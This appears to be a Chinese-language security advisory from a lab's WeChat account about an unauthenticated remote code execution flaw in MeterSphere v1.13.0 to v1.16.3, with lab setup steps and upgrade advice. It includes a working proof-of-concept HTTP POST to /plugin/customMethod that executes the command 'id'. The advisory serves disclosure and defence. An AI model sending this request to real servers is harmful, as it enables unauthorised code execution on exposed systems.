01
组件说明
MeterSphere 是一站式开源持续测试平台,涵盖测试跟踪、接口测试、性能测试、 团队协作等功能,该漏洞由于自定义插件功能处存在权限验证缺陷,致使攻击者无需经过身份验证即可通过构造特定的请求在目标系统上远程执行任意代码
02
影响版本
v1.13.0 <= MeterSphere <= v1.16.3
03
漏洞复现
通过网络空间搜索引擎对【MeterSphere】进行搜索,存在 746 条独立IP:
全球分布图如下:
中国最多为707,其次为新加坡为29。
漏洞环境搭建:
wget https://github.com/metersphere/metersphere/releases/download/v1.16.3/metersphere-online-installer-v1.16.3.tar.gz
tar zxvf metersphere-online-installer-v1.16.3.tar.gz
cd metersphere-online-installer-v1.16.3/
MSVERSION="v1.16.3"
echo $MSVERSION
sed -i -e "s#MS_IMAGE_TAG=.*#MS_IMAGE_TAG=${MSVERSION}#g" install.conf
sed -i -e "s#MS_IMAGE_PREFIX=.*#MS_IMAGE_PREFIX=registry.cn-qingdao.aliyuncs.com/metersphere#g" install.conf
/bin/bash install.sh
搭建完访问http://xxx.xxx.xxx.xxx:8081即可。
访问首页:
抓包构造未授权访问数据包:
POST /plugin/customMethod HTTP/1.1
Host: ip:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/75.0.3770.100 Safari/537.36
Content-Length: 34
Content-Type: application/json
Accept-Encoding: gzip, deflate
Connection: close
{"entry": "Evil", "request": "id"}
04
修复建议
官方已发布更新,建议升级MeterSphere到 v1.16.4及以上版本。(https://community.fit2cloud.com/#/products/metersphere/downloads)
本文章仅供学习交流,不得用于非法用途!
关于我们
启明星辰知白学院旗下安全实验室,致力于网络安全攻防实战探索与积累、解读前沿安全技术,安全培训课题、提供企业级安全自动化解决方案。
原文始发于微信公众号(河图实验室):MeterSphere未授权远程代码执行漏洞